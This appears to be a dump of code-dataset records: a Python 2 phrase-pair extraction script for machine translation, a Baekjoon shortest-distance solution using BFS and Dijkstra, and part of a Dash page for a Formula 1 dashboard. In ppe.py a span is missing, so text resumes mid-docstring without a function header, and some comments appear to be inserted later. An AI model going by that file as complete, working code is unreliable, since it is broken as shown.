(i*100/num_lines,))\n                sys.stdout.flush()\n        l1 = language1.next()\n        l2 = language2.next()\n        #print str_align, l1, l2\n        align = str_to_alignments(str_align)\n        words_aligns = create_word_align(align, l1, l2)\n        phrase_alignments = extract_alignments(align, len(l1.split()),\n                                               len(l2.split()),\n                                               max_length)\n        \n        for phrase_pair in extract_phrase_pairs_gen(phrase_alignments, l1, l2):\n            phrase_pair_freqs[phrase_pair] += 1\n            l1_phrase_freqs[phrase_pair[0]] += 1\n            l2_phrase_freqs[phrase_pair[1]] += 1\n            alignments_for_phrases[phrase_pair] = words_aligns\n\n    alignments.close()\n    language1.close()\n    language2.close()\n    sys.stdout.write('\\n')\n    return phrase_pair_freqs, l1_phrase_freqs, l2_phrase_freqs, alignments_for_phrases\n\ndef extract_words_pair_freqs(alignments_file, language1_file,\n                             language2_file, \n                             max_length = float('inf')):\n    \"\"\"Extract and count the frequency of all word pairs given an\n    alignment between sentences.\n    \n    Keyword arguments:\n    alignments_file -- file that contains the alignments\n    language1_file -- file containing sentences from language 1\n    language2_file -- file containing sentences from language 2\n    max_length -- maximum length of phrase pairs\n    \n    Returns counter of word pairs, counter of words in language 1\n    and counter of words in language 2\n    \"\"\"\n    words_pair_freqs = dict()\n    l1_words_freqs = dict()\n    l2_words_freqs = dict()\n    num_lines = number_of_lines(alignments_file)\n    alignments = open(alignments_file, 'r')\n    language1 = open(language1_file, 'r')\n    language2 = open(language2_file, 'r')\n    \n    for i, str_align in enumerate(alignments):\n        if num_lines > 100:\n            if i % (num_lines//100) == 0:\n                sys.stdout.write('\\r%d%%' % (i*100/num_lines,))\n                sys.stdout.flush()\n        l1 = language1.next()\n        l2 = language2.next()\n        #print str_align, l1, l2\n        align = str_to_alignments(str_align)\n        \n        for phrase_pair in extract_words_pairs_gen(align, l1, l2):\n            # membership test on the variable; the original tested the literal\n            # string 'phrase_pair', so every count stayed at 1\n            if phrase_pair in words_pair_freqs:\n                words_pair_freqs[phrase_pair] += 1\n            else:\n                words_pair_freqs[phrase_pair] = 1\n            \n            if phrase_pair[0] in l1_words_freqs:\n                l1_words_freqs[phrase_pair[0]] += 1\n            else:\n                l1_words_freqs[phrase_pair[0]] = 1\n            \n            if phrase_pair[1] in l2_words_freqs:\n                l2_words_freqs[phrase_pair[1]] += 1\n            else:\n                l2_words_freqs[phrase_pair[1]] = 1\n\n    alignments.close()\n    language1.close()\n    language2.close()\n    sys.stdout.write('\\n')\n    return words_pair_freqs, l1_words_freqs, l2_words_freqs\n
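\n# Added design note (hedged): the function above re-implements counting with plain\n# dicts and membership tests; initialising the three maps as collections.Counter(),\n# as extract_phrase_pair_freqs does, would let each branch collapse to 'freqs[key] += 1'.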
\ndef create_word_align(align, l1, l2):\n    \"\"\"Given alignments, extract word pairs from 2 sentences and save them as tuples.\n    \n    Keyword arguments:\n    align -- set of word alignments\n    l1 -- sentence in language 1\n    l2 -- sentence in language 2\n    \n    Returns a set of word pairs\n    \"\"\"\n    l1_words = l1.strip().split()\n    l2_words = l2.strip().split()\n    new_aligns = set()\n    for k1, k2 in align:\n        new_aligns.add((l1_words[k1], l2_words[k2]))\n    return new_aligns\n\ndef extract_words_pairs_gen(aligns, l1, l2):\n    \"\"\"Given alignments, extract word pairs from 2 sentences\n    \n    Keyword arguments:\n    aligns -- set of word alignments\n    l1 -- sentence in language 1\n    l2 -- sentence in language 2\n    \n    Yields a word pair\n    \"\"\"\n    l1_words = l1.strip().split()\n    l2_words = l2.strip().split()\n    for k1, k2 in aligns:\n        yield ((l1_words[k1]), \n               (l2_words[k2]))\n    \ndef extract_phrase_pairs_gen(phrase_alignments, l1, l2):\n    \"\"\"Given alignments, extract phrase pairs from 2 sentences\n    \n    Keyword arguments:\n    phrase_alignments -- list of phrase alignments. A phrase alignment\n    is a 4-tuple denoting the range of the constituents\n    l1 -- sentence in language 1\n    l2 -- sentence in language 2\n    \n    Yields a 2-tuple containing a phrase pair\n    \"\"\"\n    l1_words = l1.strip().split()\n    l2_words = l2.strip().split()\n    for min1, min2, max1, max2 in phrase_alignments:\n        yield (' '.join(l1_words[min1:max1+1]), \n               ' '.join(l2_words[min2:max2+1]))\n    \ndef str_to_alignments(string):\n    \"\"\"Parse an alignment from a string\n    \n    Keyword arguments:\n    string -- contains alignment\n    \n    Return a set of 2-tuples. First value is index of word in language 1,\n    second value is index of word in language 2\n    \"\"\"\n    string_list = string.strip().split()\n    alignments = set()\n    \n    for a_str in string_list:\n        a1_str, a2_str = a_str.split('-')\n        alignments.add((int(a1_str), int(a2_str)))\n\n    return alignments\n
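\n# Added example (hedged): str_to_alignments('0-0 1-2') -> {(0, 0), (1, 2)}, i.e.\n# word 0 of sentence 1 aligns with word 0 of sentence 2, and word 1 with word 2.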
phrase_alignments = [(0,0), (2,0)]\n    returns [1], []\n    because index 1 in sentence 1 is not covered.\n    \n    Keyword arguments:\n    phrase_alignments -- list of 2-tuples denoting the alignment between words\n    max_length -- maximum length of a phrase alignment\n    \n    Returns 2 lists of indexes that are not covered\n    \"\"\"\n    min1, min2, max1, max2 = phrase_range(phrase_alignments)\n    if max1-min1+1 > max_length or max2-min2+1 > max_length:\n        return [], []\n\n    range1 = range(min1, max1+1)\n    range2 = range(min2, max2+1)\n    for a1, a2 in phrase_alignments:\n        if a1 in range1:\n            range1.remove(a1)\n        if a2 in range2:\n            range2.remove(a2)\n\n    return range1, range2\n    \ndef phrase_range(phrase_alignments):\n    \"\"\"Calculate the range of a phrase alignment\n    \n    Keyword arguments:\n    phrase_alignments -- list of 2-tuples denoting the alignment between words\n    \n    Returns a 4-tuple denoting the range of the phrase alignment\n    \"\"\"\n    min1 = min2 = float('inf')\n    max1 = max2 = float('-inf')\n    for (a1, a2) in phrase_alignments:\n        if a1 < min1:\n            min1 = a1\n        if a1 > max1:\n            max1 = a1\n        if a2 < min2:\n            min2 = a2\n        if a2 > max2:\n            max2 = a2\n\n    return min1, min2, max1, max2\n\ndef extract_alignments(word_alignments, l1_length, l2_length,\n                       max_length = float('inf')):\n    \"\"\"Extracts all alignments between 2 sentences given a word alignment\n    \n    Keyword arguments:\n    word_alignments -- set of 2-tuples denoting alignment between words in \n    2 sentences\n    l1_length -- length of sentence 1\n    l2_length -- length of sentence 2\n    max_length -- maximum length of a phrase pair\n    \n    Returns set of 4-tuples denoting the range of phrase_alignments\n    \"\"\"\n    phrase_queue = set()\n    # copy to use later for singletons\n    word_alignments_orig = set(word_alignments)\n    # First form words into phrase pairs\n    while len(word_alignments):\n        phrase_alignment_init = word_alignments.pop()\n        phrase_alignment = set([phrase_alignment_init])\n        phrase_alignment_exp = [[phrase_alignment_init[0]], \n                                [phrase_alignment_init[1]]]\n        while phrase_alignment_exp[0] or phrase_alignment_exp[1]:\n            added_points = set([(x, y) for (x, y) in word_alignments \n                                if (x in phrase_alignment_exp[0] \n                                    or y in phrase_alignment_exp[1])])\n            # stop if no alignment can fill the gaps\n            if not added_points:\n                break\n\n            phrase_alignment |= added_points\n            word_alignments -= added_points\n            phrase_alignment_exp = phrase_alignment_expansions(phrase_alignment, max_length)\n\n        align_range = phrase_range(phrase_alignment)\n        add_phrase_alignment(phrase_queue, align_range, max_length,\n                             l1_length, l2_length)\n\n    # Then loop over phrase pairs to join them together into new ones\n    phrase_alignment_list = set()\n    while len(phrase_queue):\n        p1 = phrase_queue.pop()\n        new_p3 = set()\n        # add singletons\n        singleton = set([(x, y) for (x, y) in word_alignments_orig \n                         if x == p1[0]-1])\n        if not singleton:\n            p3 = p1[0]-1, p1[1], p1[2], p1[3]\n            add_phrase_alignment(new_p3, p3, max_length, \n                                 l1_length, l2_length)\n        singleton = set([(x, y) for (x, y) in word_alignments_orig \n                         if x == p1[2]+1])\n        if not singleton:\n            p3 = p1[0], p1[1], p1[2]+1, p1[3]\n            add_phrase_alignment(new_p3, p3, max_length, \n                                 l1_length, l2_length)\n        singleton = set([(x, y) for (x, y) in word_alignments_orig \n                         if y == p1[1]-1])\n        if not singleton:\n            p3 = p1[0], p1[1]-1, p1[2], p1[3]\n            add_phrase_alignment(new_p3, p3, max_length,\n                                 l1_length, l2_length)\n        singleton = set([(x, y) for (x, y) in word_alignments_orig \n                         if y == p1[3]+1])\n        if not singleton:\n            p3 = p1[0], p1[1], p1[2], p1[3]+1\n            add_phrase_alignment(new_p3, p3, 
max_length,\n                                 l1_length, l2_length)\n\n        for p2 in phrase_queue:\n            p3 = None\n            if p1[0] == p2[2]+1 and p1[1] == p2[3]+1:\n                # p2 above, to the left of p1\n                p3 = p2[0], p2[1], p1[2], p1[3]\n            elif p1[2] == p2[0]-1 and p1[1] == p2[3]+1:\n                # p2 above, to the right of p1\n                p3 = p1[0], p2[1], p2[2], p1[3]\n            elif p1[0] == p2[2]+1 and p1[3] == p2[1]-1:\n                # p2 below, to the left of p1\n                p3 = p2[0], p1[1], p1[2], p2[3]\n            elif p1[2] == p2[0]-1 and p1[3] == p2[1]-1:\n                # p2 below, to the right of p1\n                p3 = p1[0], p1[1], p2[2], p2[3]\n            # if p3 exists and is smaller or equal to the max length\n            add_phrase_alignment(new_p3, p3, max_length,\n                                 l1_length, l2_length)\n\n        phrase_alignment_list.add(p1)\n        phrase_queue |= new_p3\n\n    return phrase_alignment_list\n\ndef phrase_pairs_to_file(file_name, l1_given_l2, l2_given_l1, l1_lexical_given_l2, l2_lexical_given_l1, l1_phrase_freqs, l2_phrase_freqs, phrase_pair_freqs):\n    \"\"\"Write phrase pairs with their conditional probabilities, lexical\n    weights and frequencies to a file\n    \n    Keyword arguments:\n    file_name -- name of file for writing\n    l1_given_l2 -- dictionary mapping phrase pair (l1, l2) to its conditional \n    probability P(l1 | l2)\n    l2_given_l1 -- dictionary mapping phrase pair (l1, l2) to its conditional \n    probability P(l2 | l1)\n    l1_lexical_given_l2 -- dictionary mapping phrase pair (l1, l2) to the\n    lexical weight of l1 given l2\n    l2_lexical_given_l1 -- dictionary mapping phrase pair (l1, l2) to the\n    lexical weight of l2 given l1\n    l1_phrase_freqs -- counter of phrases in language 1\n    l2_phrase_freqs -- counter of phrases in language 2\n    phrase_pair_freqs -- counter of phrase pairs\n    \"\"\"\n    out = open(file_name, 'w')\n    for pair in phrase_pair_freqs:\n        out.write('(%s, %s, %s, %s, %s, %s, %s, %s)\\n' % (pair, l1_given_l2[pair], l2_given_l1[pair], l1_lexical_given_l2[pair], l2_lexical_given_l1[pair], l1_phrase_freqs[pair[0]], l2_phrase_freqs[pair[1]], phrase_pair_freqs[pair]))\n\n    out.close()\n\ndef number_of_lines(file_name):\n    \"\"\"Counts the number of lines in a file\n    \n    Keyword arguments:\n    file_name -- name of file\n    \n    Returns number of lines\n    \"\"\"\n    amount = 0\n    doc = open(file_name, 'r')\n    for _ in doc:\n        amount += 1\n\n    doc.close()\n    return amount\n\ndef main():\n    \"\"\"Read the following arguments from the cmd line:\n    - name of file containing the alignments\n    - name of file containing sentence of language 1\n    - name of file containing sentence of language 2\n    - name of file for writing output\n    - maximum length of a phrase pair\n    \"\"\"\n    \n    \"\"\"\n    arg_parser = argparse.ArgumentParser()\n    arg_parser.add_argument(\"-a\", \"--alignments\",\n                            help=\"File containing alignments\")\n    arg_parser.add_argument(\"-l1\", \"--language1\",\n                            help=\"File containing sentences of language 1\")\n    arg_parser.add_argument(\"-l2\", \"--language2\",\n                            help=\"File containing sentences of language 2\")\n    arg_parser.add_argument(\"-o\", \"--output\",\n                            help=\"File name of output\")\n    arg_parser.add_argument(\"-m\", \"--max_length\",\n                            help=\"Maximum length of phrase pairs\")\n    \"\"\"\n    \n    \"\"\"\n    #args = arg_parser.parse_args()\n    alignments = args.alignments\n    language1 = args.language1\n    language2 = args.language2\n    output_name = args.output\n    max_length = int(args.max_length)\n    \"\"\"\n    alignments = \"alignments\"\n    language1 = \"language1\"\n    language2 = \"language2\"\n    output_name = \"output\"\n    max_length = 5\n\n    \n    freqs = extract_phrase_pair_freqs(alignments, language1, language2, max_length)\n    words_freqs = extract_words_pair_freqs(alignments, language1, language2, max_length)\n    phrase_pair_freqs, l1_phrase_freqs, l2_phrase_freqs, words_alignments = freqs\n    words_pair_freqs, l1_words_freqs, l2_words_freqs = words_freqs\n    l1_given_l2, l2_given_l1 = conditional_probabilities(phrase_pair_freqs, \n                                                         l1_phrase_freqs, l2_phrase_freqs)\n    
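# the word-level conditionals computed next are the inputs to lexical_probabilities below\n    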
l1_word_given_l2, l2_word_given_l1 = conditional_probabilities(words_pair_freqs, \n                                                               l1_words_freqs, l2_words_freqs)\n    l1_lexical_given_l2, l2_lexical_given_l1 = lexical_probabilities(phrase_pair_freqs, l1_word_given_l2, l2_word_given_l1, words_alignments)\n    #l2_phrase_probs = phrase_probabilities(l2_phrase_freqs)\n    #joint_probs = joint_probabilities(l1_given_l2, l2_phrase_probs)\n    phrase_pairs_to_file(output_name, l1_given_l2, l2_given_l1, l1_lexical_given_l2, l2_lexical_given_l1, l1_phrase_freqs, l2_phrase_freqs, phrase_pair_freqs)\n\n    \nif __name__ == '__main__':\n    main()\n","repo_name":"hubert667/ALT","sub_path":"ppe.py","file_name":"ppe.py","file_ext":"py","file_size_in_byte":19407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
+{"seq_id":"20966089743","text":"# Find the cities at a given shortest distance\n# bfs\n# https://www.acmicpc.net/problem/18352\n\n\n# <--------BFS------------>\n# import sys\n# from collections import deque\n \n# input = sys.stdin.readline\n\n# # number of cities N, number of roads M, target distance K, start city X\n# n,m,k,x = map(int,input().rstrip().rsplit())\n# visited = [False] * (n+1)\n# graph = [[] for _ in range(n+1)]\n# result = []\n\n# for _ in range(m):\n#     a,b = map(int,input().rstrip().rsplit())\n#     graph[a].append(b)\n\n# Q = deque()\n# Q.append((0,x))\n# visited[x]=False\n\n# while Q:\n#     time,node = Q.popleft()\n#     for v in graph[node]:\n#         # only enqueue unvisited nodes, with distance +1\n#         if not visited[v]:\n#             visited[v] = time + 1\n#             Q.append((time+1, v))\n\n# for i in range(len(visited)):\n#     if visited[i]==k:\n#         result.append(i)\n\n# if len(result)==0:\n#     print(-1)\n\n# elif len(result)==1:\n#     if x==result[0] and k!=0:\n#         print(-1)\n#     else:\n#         result.sort()\n#         for num in result:\n#             print(num)\n# else:\n#     result.sort()\n#     for num in result:\n#         print(num)\n\n\n# <--------Dijkstra------------>\nimport sys\nimport heapq\nimport collections\ninput = sys.stdin.readline\n\n# number of cities N, number of roads M, target distance K, start city X\nn,m,k,x = map(int,input().rstrip().rsplit())\ngraph = [[] for _ in range(n+1)]\nresult = []\n\nfor _ in range(m):\n    a,b = map(int,input().rstrip().rsplit())\n    graph[a].append((b,1))\n\nQ = [(0,x)]\ndist = collections.defaultdict(int)\n\nwhile Q:\n    time,node = heapq.heappop(Q)\n    if node not in dist:\n        dist[node] = time\n        for v,w in graph[node]:\n            heapq.heappush(Q,(time+1,v))\n        # count each node only on its first (shortest-distance) pop\n        if time == k:\n            result.append(node)\n\nif len(result)==0:\n    print(-1)\n\nelif len(result)==1:\n    if x==result[0] and k!=0:\n        print(-1)\n    else:\n        result.sort()\n        for num in result:\n            print(num)\nelse:\n    result.sort()\n    for num in result:\n        print(num)","repo_name":"uoayop/study.algorithm","sub_path":"baekjoon/18352.py","file_name":"18352.py","file_ext":"py","file_size_in_byte":2059,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
+{"seq_id":"20518801919","text":"import dash\nfrom dash import html, dcc\nimport pandas as pd\nfrom datetime import datetime\nimport Alpine.gp as f1\nimport os.path as path\nimport plotly.express as px\nimport numpy as np\nimport Alpine.strat as strat\nimport Alpine.utils as utils\nimport json\n\ndash.register_page(__name__, path=\"/grand-prix\", path_template=\"/grand-prix/<year>/<event>/<session>\",\n                   title=\"Alpine Fan F1 Dashboard | Grand Prix\",\n                   description=\"Get all Formula 1's data on any Grand Prix since 2018. 
Choose your year, your event and the session, then have fun!\",\n                   image_url=\"https://alpinefan.robcorp.net/assets/images/logo.png\")\n\n\n# Setting up the dataframe\ndef get_dataframe():\n    gp_data = pd.read_csv(path.join(\"data\", \"dates.csv\"))\n    gp_data['Date'] = pd.to_datetime(gp_data['Date'])\n    today = datetime.today()\n    gp_data['Race_Status'] = np.where(gp_data['Date'] < today, 'Past', 'Future')\n    color_map = {'Past': '#2ecc71', 'Future': '#e74c3c'}\n    gp_data['Color'] = gp_data['Race_Status'].map(color_map)\n    return gp_data\n\n\ndef make_map(filtered_data):\n    map_fig = px.scatter_geo(filtered_data, lat='Lat', lon='Long', hover_name='Name', hover_data=[\"Year\", \"Round\"],\n                             color=\"Color\", color_discrete_sequence=list(pd.unique(filtered_data['Color'])))\n    map_fig.update_geos(bgcolor=\"#2c3e50\", showcountries=True, countrycolor=\"#ecf0f1\",\n                        showcoastlines=True, coastlinecolor=\"#ecf0f1\", showframe=False)\n    map_fig.update_layout(\n        margin=dict(l=0, r=0, t=0, b=0),\n        plot_bgcolor='rgba(0,0,0,0)',\n        paper_bgcolor='rgba(0,0,0,0)',\n        showlegend=False,\n        dragmode=False\n    )\n    map_fig.update_traces(marker_size=10)\n    return map_fig\n\n\ndef race_result(content, results):\n    classement = []\n    d_color = html.Div(className=\"color\")\n    change = html.Div(className=\"evolution\")\n    d_pos = html.Div(className=\"pos\", children=\"Pos\")\n    d_num = html.Div(className=\"num\", children=\"N°\")\n    d_name = html.Div(className=\"name\", children=\"Driver\")\n    d_team = html.Div(className=\"team\", children=\"Team\")\n    d_time = html.Div(className=\"time\", children=\"Time\")\n    d_pts = html.Div(className=\"pts\", children=\"Pts\")\n    classement.append(\n        html.Div(className=\"driver row\",\n                 children=[html.Div(className=\"flex\", children=[d_color, change, d_pos]), d_num, d_name, d_team, d_time,\n                           d_pts])\n    )\n    for index, row in results.iterrows():\n        d_color = html.Div(className=\"color\", style={\"background-color\": f\"#{row['TeamColor']}\"})\n        if (row['Position'] - row['GridPosition']) < 0:\n            change = html.Img(className=\"evolution\", src=\"/assets/images/grow.svg\")\n        elif (row['Position'] - row['GridPosition']) == 0:\n            change = html.Img(className=\"evolution\", src=\"/assets/images/stable.svg\")\n        elif (row['Position'] - row['GridPosition']) > 0:\n            change = html.Img(className=\"evolution\", src=\"/assets/images/decrease.svg\")\n        d_pos = html.Div(className=\"pos\", children=row['ClassifiedPosition'])\n        d_num = html.Div(className=\"num\", children=row['DriverNumber'])\n        d_name = html.Div(className=\"name\", children=row['FullName'])\n        d_team = html.Div(className=\"team\", children=row['TeamName'])\n        if row['Position'] == 1:\n            d_time = html.Div(className=\"time\",\n                              children=f\"{row['Time'].seconds // 3600:02d}:{(row['Time'].seconds // 60) % 60:02d}:{row['Time'].seconds % 60:02d}.{int(row['Time'].total_seconds() * 1000) % 1000:03d}\")\n        elif pd.isnull(row.Time):\n            d_time = html.Div(className=\"time\", children=row['Status'])\n        else:\n            d_time = html.Div(className=\"time\",\n                              children=f\"{row['Time'].total_seconds():.3f}s\")\n        d_pts = html.Div(className=\"pts\", children=row['Points'])\n        if row['Position'] < 4:\n            cl = \"driver\"\n        else:\n            cl = \"driver full\"\n        classement.append(\n            html.Div(className=cl,\n                     children=[html.Div(className=\"flex\", children=[d_color, change, d_pos]), d_num, d_name, d_team,\n                               d_time,\n                               d_pts])\n        )\n    more = html.Img(id=\"more-race\", src=\"/assets/images/more.svg\")\n    content.append(html.Div(className=\"race\", children=[html.Div(className=\"title\", children=\"Race 
Results\"),\n                                                        html.Div(id=\"race-results\", children=classement), more]))\n    return content\n\n\ndef qualy_result(content, results):\n    classement = []\n    d_color = html.Div(className=\"color\")\n    d_pos = html.Div(className=\"pos\", children=\"Pos\")\n    d_num = html.Div(className=\"num\", children=\"N°\")\n    d_name = html.Div(className=\"name\", children=\"Driver\")\n    d_team = html.Div(className=\"team\", children=\"Team\")\n    d_time = html.Div(className=\"time\", children=\"Q1\")\n    d_time2 = html.Div(className=\"time\", children=\"Q2\")\n    d_time3 = html.Div(className=\"time\", children=\"Q3\")\n    classement.append(\n        html.Div(className=\"driver row\",\n                 children=[html.Div(className=\"flex\", children=[d_color, d_pos]), d_num, d_name, d_team, d_time,\n                           d_time2, d_time3])\n    )\n\n    results.Q1 = pd.to_timedelta(results.Q1)\n    results.Q2 = pd.to_timedelta(results.Q2)\n    results.Q3 = pd.to_timedelta(results.Q3)\n\n    def Q_time(time, results_time):\n        if not pd.isnull(time):\n            if time == results_time.min():\n                classname = \"time min\"\n            else:\n                classname = \"time\"\n            d_time = html.Div(className=classname,\n                              children=f\"{(time.seconds // 60) % 60:02d}:{time.seconds % 60:02d}.{int(time.total_seconds() * 1000) % 1000:03d}\")\n        else:\n            d_time = html.Div(className=\"time\", children=\"-\")\n        return d_time\n\n    for index, row in results.iterrows():\n        d_color = html.Div(className=\"color\", style={\"background-color\": f\"#{row['TeamColor']}\"})\n        d_pos = html.Div(className=\"pos\", children=row['Position'])\n        d_num = html.Div(className=\"num\", children=row['DriverNumber'])\n        d_name = html.Div(className=\"name\", children=row['FullName'])\n        d_team = html.Div(className=\"team\", children=row['TeamName'])\n        d_time = Q_time(row.Q1, results.Q1)\n        d_time2 = Q_time(row.Q2, results.Q2)\n        d_time3 = Q_time(row.Q3, results.Q3)\n        if row['Position'] < 4:\n            cl = \"driver\"\n        else:\n            cl = \"driver full\"\n        classement.append(\n            html.Div(className=cl,\n                     children=[html.Div(className=\"flex\", children=[d_color, d_pos]), d_num, d_name, d_team, d_time,\n                               d_time2, d_time3])\n        )\n    more = html.Img(id=\"more-race\", src=\"/assets/images/more.svg\")\n    content.append(html.Div(className=\"race\", children=[html.Div(className=\"title\", children=\"Qualifying Results\"),\n                                                        html.Div(id=\"race-results\", children=classement), more]))\n    return content\n\n\n# Build the header for all the different grand prix pages\ndef header(year, event, session, sprint, first, last):\n    if session != \"fp\" and session != \"qualif\" and (session != \"sprint\" or not sprint) and session != \"race\":\n        head = html.A(children=html.Div(className=\"active link\",\n                                        children=[html.Label(className=\"desktop\", children=\"Overview\"),\n                                                  html.Label(className=\"mobile\", children=\"Home\")]),\n                      href=f\"/grand-prix/{year}/{event}/overview\"),\n    else:\n        head = html.A(children=html.Div(className=\"link\",\n                                        children=[html.Label(className=\"desktop\", children=\"Overview\"),\n                                                  html.Label(className=\"mobile\", children=\"Home\")]),\n                      href=f\"/grand-prix/{year}/{event}/overview\"),\n    if session == \"fp\":\n        head += html.A(children=html.Div(className=\"active link\",\n                                         children=[html.Label(className=\"desktop\", children=\"Free Practice\"),\n                                                   html.Label(className=\"mobile\", children=\"FP\")]),\n                       href=f\"/grand-prix/{year}/{event}/fp\"),\n    else:\n        head += html.A(children=html.Div(className=\"link\",\n                                         children=[html.Label(className=\"desktop\", children=\"Free Practice\"),\n                                                   html.Label(className=\"mobile\", children=\"FP\")]),\n                       
href=f\"/grand-prix/{year}/{event}/fp\"),\n if session == \"qualif\":\n head += html.A(children=html.Div(className=\"active link\",\n children=[html.Label(className=\"desktop\", children=\"Qualifying\"),\n html.Label(className=\"mobile\", children=\"Q\")]),\n href=f\"/grand-prix/{year}/{event}/qualif\"),\n else:\n head += html.A(children=html.Div(className=\"link\",\n children=[html.Label(className=\"desktop\", children=\"Qualifying\"),\n html.Label(className=\"mobile\", children=\"Q\")]),\n href=f\"/grand-prix/{year}/{event}/qualif\"),\n if sprint:\n if session == \"sprint\":\n head += html.A(children=html.Div(className=\"active link\",\n children=[html.Label(className=\"desktop\", children=\"Sprint\"),\n html.Label(className=\"mobile\", children=\"S\")]),\n href=f\"/grand-prix/{year}/{event}/sprint\"),\n else:\n head += html.A(children=html.Div(className=\"link\",\n children=[html.Label(className=\"desktop\", children=\"Sprint\"),\n html.Label(className=\"mobile\", children=\"S\")]),\n href=f\"/grand-prix/{year}/{event}/sprint\"),\n if session == \"race\":\n head += html.A(children=html.Div(className=\"active link\",\n children=[html.Label(className=\"desktop\", children=\"Race\"),\n html.Label(className=\"mobile\", children=\"Race\")]),\n href=f\"/grand-prix/{year}/{event}/race\"),\n else:\n head += html.A(children=html.Div(className=\"link\", children=[html.Label(className=\"desktop\", children=\"Race\"),\n html.Label(className=\"mobile\", children=\"Race\")]),\n href=f\"/grand-prix/{year}/{event}/race\"),\n if first[0]:\n previous = html.A(className=\"previous change off\",\n children=[html.I(className='fas fa-arrow-left'), html.Label(children=\"Previous\")])\n else:\n previous = html.A(className=\"previous change\",\n children=[html.I(className='fas fa-arrow-left'), html.Label(children=\"Previous\")],\n href=f\"/grand-prix/{first[1]}/overview\")\n if last[0]:\n next = html.A(className=\"next change off\",\n children=[html.Label(children=\"Next\"), html.I(className='fas fa-arrow-right')])\n else:\n next = html.A(className=\"next change\",\n children=[html.Label(children=\"Next\"), html.I(className='fas fa-arrow-right')],\n href=f\"/grand-prix/{last[1]}/overview\")\n return html.Div(className=\"gp-header\", children=[\n html.Div(className=\"left\", children=[\n previous\n ]),\n html.Div(className=\"hor-nav\", children=head),\n html.Div(className=\"right\", children=[\n next\n ]),\n ])\n\n\n# Creating the FP page\ndef fp_design(Fp, parts, fp):\n parts[\"lap_times\"].append(\n html.Div(className=\"plot lap_times\", children=dcc.Graph(id=f'{Fp}_lap_times', figure=fp.lap_times(Fp))))\n parts[\"violin_st\"].append(\n html.Div(className=\"plot violin_st\", children=dcc.Graph(id=f'{Fp}_violin_st', figure=fp.violin_st(Fp))))\n parts[\"violin_lap\"].append(\n html.Div(className=\"plot violin_lap\", children=dcc.Graph(id=f'{Fp}_violin_lap', figure=fp.violin_lap(Fp))))\n parts[\"race_sim\"].append(\n html.Div(className=\"plot race_sim\", children=dcc.Graph(id=f'{Fp}_race_sim', figure=fp.race_sim(Fp))))\n parts[\"top_speed\"].append(\n html.Div(className=\"plot top_speed\", children=dcc.Graph(id=f'{Fp}_top_speed', figure=fp.top_speed(Fp))))\n parts[\"lap_comp\"].append(\n html.Div(className=\"plot lap_comp\", children=dcc.Graph(id=f'{Fp}_lap_comp', figure=fp.lap_comp(Fp))))\n return parts\n\n\ndef fp(year, event):\n fp = f1.get_fp(year, event)\n fp1, fp2, fp3, date = fp.get_load\n parts = {\n \"lap_times\": [],\n \"violin_st\": [],\n \"violin_lap\": [],\n \"race_sim\": [],\n \"top_speed\": [],\n 
\"lap_comp\": [],\n }\n comming = []\n if fp1:\n parts = fp_design(\"Fp1\", parts, fp)\n elif date[0] != \"Never\":\n comming.append(\n html.Div(className=\"plot comming\", children=html.P(children=date[0]))\n )\n if fp2:\n parts = fp_design(\"Fp2\", parts, fp)\n elif date[1] != \"Never\":\n comming.append(\n html.Div(className=\"plot comming\", children=html.P(children=date[1]))\n )\n if fp3:\n parts = fp_design(\"Fp3\", parts, fp)\n elif date[2] != \"Never\":\n comming.append(\n html.Div(className=\"plot comming\", children=html.P(children=date[2]))\n )\n return parts[\"lap_times\"] + parts[\"violin_st\"] + parts[\"violin_lap\"] + parts[\"race_sim\"] + parts[\n \"top_speed\"] + comming + parts[\"lap_comp\"]\n\n\ndef Qualy(year, event, name):\n qualy = f1.get_quali(year, event)\n q, date = qualy.get_load\n main = []\n if q:\n try:\n main = qualy_result(main, qualy.results)\n except:\n utils.error(f\"Could not show Qualy results for {name} {year}\")\n main.append(\n html.Div(className=\"plot lap_times\", children=dcc.Graph(id='qualy_lap_times', figure=qualy.lap_times())))\n main.append(\n html.Div(className=\"plot violin_st\", children=dcc.Graph(id='qualy_violin_st', figure=qualy.violin_st())))\n main.append(\n html.Div(className=\"plot violin_lap\", children=dcc.Graph(id='qualy_violin_lap', figure=qualy.violin_lap())))\n main.append(\n html.Div(className=\"plot top_speed\", children=dcc.Graph(id='qualy_top_speed', figure=qualy.top_speed())))\n main.append(\n html.Div(className=\"plot lap_comp\", children=dcc.Graph(id='qualy_lap_comp', figure=qualy.lap_comp())))\n else:\n main.append(\n html.Div(className=\"plot comming\", children=html.P(children=date))\n )\n return main\n\n\ndef Sprint(year, event, format, name):\n sprint = f1.get_sprint(year, event, format)\n q, r, q_date, r_date = sprint.get_load\n main = []\n try:\n main = race_result(main, sprint.results)\n except:\n if r:\n utils.error(f\"Could not show Race results for {name} {year}\")\n if format == \"sprint_shootout\" and q:\n main.append(\n html.Div(className=\"plot lap_times\",\n children=dcc.Graph(id='sprint_lap_times', figure=sprint.Q_lap_times())))\n main.append(\n html.Div(className=\"plot violin_st\",\n children=dcc.Graph(id='sprint_violin_st', figure=sprint.Q_violin_st())))\n main.append(\n html.Div(className=\"plot violin_lap\",\n children=dcc.Graph(id='sprint_violin_lap', figure=sprint.Q_violin_lap())))\n main.append(\n html.Div(className=\"plot top_speed\",\n children=dcc.Graph(id='sprint_top_speed', figure=sprint.Q_top_speed())))\n main.append(\n html.Div(className=\"plot lap_comp\", children=dcc.Graph(id='sprint_lap_comp', figure=sprint.Q_lap_comp())))\n elif format == \"sprint_shootout\":\n main.append(\n html.Div(className=\"plot comming\", children=html.P(children=q_date))\n )\n if r:\n try:\n main.append(html.Div(className=\"plot lap_comp\",\n children=dcc.Graph(id='race_delta_to_first', figure=sprint.delta_to_first())))\n except:\n utils.error(f\"Sprint delta to first from {event} {year} could not be displayed\")\n main.append(\n html.Div(className=\"plot lap_comp\", children=dcc.Graph(id='race_lap_times', figure=sprint.lap_times())))\n main.append(\n html.Div(className=\"plot violin_st\", children=dcc.Graph(id='race_violin_st', figure=sprint.violin_st())))\n main.append(\n html.Div(className=\"plot violin_lap\", children=dcc.Graph(id='race_violin_lap', figure=sprint.violin_lap())))\n main.append(\n html.Div(className=\"plot top_speed\", children=dcc.Graph(id='race_top_speed', figure=sprint.top_speed())))\n 
